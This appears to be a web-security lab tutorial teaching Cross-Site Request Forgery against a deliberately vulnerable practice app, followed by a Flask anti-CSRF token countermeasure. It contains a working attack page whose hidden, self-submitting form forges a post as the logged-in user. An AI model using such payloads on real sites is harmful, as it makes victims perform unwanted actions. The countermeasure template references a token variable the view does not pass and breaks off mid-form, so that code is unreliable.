Skip to content

Cross-Site Request Forgery

A cross-site request occurs when a user interacts with one website via an HTTP request, but that interaction unintentionally triggers an action on a different website. This concept is essential in the CSRF vulnerability, since the attacker exploits the trust a website places in a user’s browser. By tricking the user into performing unintentional actions, such as transferring funds, changing settings, or submitting forms, the attacker can execute malicious operations on behalf of the authenticated user.

Attack

In this attack you will create a post on behalf of user mr_robot, exploring the /create_post endpoint. The procedure is the following:

  1. Create a file named index.html at the attacker with the following code:

    CSRF Attack Page 
    <!DOCTYPE html>
<html>
    <head>
        <title>Fake Form</title>
    </head>
    <body onload="document.post_request.submit()">
        <form action="http://192.168.0.100/create_post" method="POST" name="post_request" style="display: none;">
            <input type="text" name="content" value="This is a forged post"/>
        </form>
    </body>
</html>

  2. Run an HTTP server at the attacker using python3 -m http.server 80.

  3. Open a Wireshark probe at the victim-browser interface.
  4. Login as mr_robot at Hackergram.
  5. On another tab, access the attacker by entering http://192.168.0.10.
  6. Check that the attack was successful, e.g., by searching the posts of mr_robot at Hackergram.
  7. Analyze the HTTP packets exchanged with Hackergram and identify the HTTP packet used for the attack. Check that the session cookie of this packet is the same as the other HTTP packets used in the mr_robot session.
  8. Now logout mr_robot from Hackergram and try the attack again. Was it successful? Why?

Additional exercise

Hackergram has other endpoints vulnerable to CSRF attacks. It has a total of six vulnerable endpoints, some using GET and others using POST. Explore Hackergram by creating a new user and observing the exchanged traffic when different actions are performed. This can be done using Wireshark or the Web Console of Firefox (Network tab). Based on this analysis, write the HTML code required to perform the attack, and demonstrate that it works.

Countermeasure

To prevent this attack, Hackergram should incorporate the use of anti-CSRF tokens. An anti-CSRF is a unique, secret, and unpredictable value generated by the server and included in each form submission. To implement them, the steps are:

  1. On the Hackergram machine, open the views.py file and add the following lines at the start of the file to enable CSRF protection: 
    from flask_wtf.csrf import CSRFProtect, generate_csrf
csrf = CSRFProtect(app)
  2. After enabling CSRF protection globally inside the /create_post function, change it so the return_render template function includes the CSRF token: 
    return render_template('create_post.html', current_user=user, anti_csrf_token=generate_csrf())
  3. The last step for the HTML templates for the create post endpoint (create_post.html) is to add the CSRF token as a hidden field of the form. 
    <div class="card-body">
    <form action="/create_post" method="post">
        <input type="hidden" name="csrf_token" value="{{ csrf_token }}">